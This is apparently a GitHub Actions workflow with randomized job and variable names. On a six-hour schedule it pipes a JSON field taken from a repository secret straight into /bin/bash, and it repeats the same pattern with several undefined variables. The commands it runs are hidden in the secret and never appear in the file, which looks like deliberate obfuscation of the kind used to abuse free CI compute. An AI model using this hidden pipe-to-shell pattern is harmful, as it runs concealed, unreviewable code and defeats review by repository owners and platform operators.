name: xianghuaguo3451

on:
  workflow_dispatch:
  schedule:
    - cron: '30 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianghuaguo3451
        env:
          uzcmr6: ${{ secrets.uzcmr6 }}
        run: |
          echo $uzcmr6 | jq -r .afw2668 | /bin/bash
          echo $rtvsh465 | jq -r .i089 | /bin/bash
          echo $et1 | jq -r .anyjx971 | /bin/bash
          echo $i7 | jq -r .y7207 | /bin/bash
          echo $bpxh9502 | jq -r .piai3 | /bin/bash

